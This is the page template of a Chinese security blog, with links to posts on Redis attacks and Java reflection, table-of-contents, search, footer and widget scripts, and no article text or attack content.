                <a href="/2022/02/24/redis%E6%94%BB%E5%87%BB%E6%80%BB%E7%BB%93/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/5.jpg" class="responsive-img" alt="redis攻击总结">
                        
                        <span class="card-title">redis攻击总结</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-02-24
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            wa1ki0g
                            
                        </span>
                    </div>
                </div>

                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/02/16/javaSec-java%E7%9A%84%E5%8F%8D%E5%B0%84%E8%AF%A6%E8%A7%A3/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/16.jpg" class="responsive-img" alt="JavaSec-java的反射详解">
                        
                        <span class="card-title">JavaSec-java的反射详解</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-02-16
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            wa1ki0g
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
           
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
                <script>
                    var calcSiteTime = function () {
                        var seconds = 1000;
                        var minutes = seconds * 60;
                        var hours = minutes * 60;
                        var days = hours * 24;
                        var years = days * 365;
                        var today = new Date();
                        var startYear = "2021";
                        var startMonth = "11";
                        var startDate = "28";
                        var startHour = "0";
                        var startMinute = "0";
                        var startSecond = "0";
                        var todayYear = today.getFullYear();
                        var todayMonth = today.getMonth() + 1;
                        var todayDate = today.getDate();
                        var todayHour = today.getHours();
                        var todayMinute = today.getMinutes();
                        var todaySecond = today.getSeconds();
                        var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                        var diff = t2 - t1;
                        var diffYears = Math.floor(diff / years);
                        var diffDays = Math.floor((diff / days) - diffYears * 365);

                        // 区分是否有年份.
                        var language = 'zh-CN';
                        if (startYear === String(todayYear)) {
                            document.getElementById("year").innerHTML = todayYear;
                            var daysTip = 'This site has been running for ' + diffDays + ' days';
                            if (language === 'zh-CN') {
                                daysTip = '本站已运行 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                daysTip = '本站已運行 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = daysTip;
                        } else {
                            document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                            var yearsAndDaysTip = 'This site has been running for ' + diffYears + ' years and '
                                + diffDays + ' days';
                            if (language === 'zh-CN') {
                                yearsAndDaysTip = '本站已运行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                yearsAndDaysTip = '本站已運行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = yearsAndDaysTip;
                        }
                    }

                    calcSiteTime();
                </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">










</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true,"react":{"opacity":0.7}}});</script></body>

</html>
